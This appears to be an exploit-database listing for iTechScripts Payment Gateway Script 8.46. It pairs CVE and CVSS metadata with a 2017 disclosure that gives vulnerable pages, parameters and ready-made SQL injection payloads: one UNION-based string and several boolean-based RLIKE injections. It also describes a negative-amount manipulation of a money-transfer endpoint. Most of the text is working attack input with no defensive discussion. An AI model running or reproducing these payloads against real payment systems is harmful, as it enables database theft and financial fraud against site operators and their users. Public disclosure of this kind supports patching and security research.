Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-29654 | CWE-89 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-01-19 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
iTechScripts Payment Gateway Script 8.46 SQL Injection Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability Author : Hasan Emre Ozer Google Dork : - Date : 18/01/2017 Type : webapps Platform: PHP Vendor Homepage : http://itechscripts.com/payment-gateway-script/ <http://itechscripts.com/image-sharing-script/> Sofware Price and Demo : $400 http://payment-gateway.itechscripts.com <http://photo-sharing.itechscripts.com/> ------------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/user-profile.php Vulnerable Parameters: token Method: GET Payload: -3519' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# ------------------------------------------------------ Type: IDOR Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php Vulnerable Parameters: t_amount and t_paid Method: POST Payload: negative money value (ps:-1350) ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php Vulnerable Parameters: token Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php Vulnerable Parameters: token Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/overview.php Vulnerable Parameters: limit Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH -- Best Regards, Hasan Emre
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.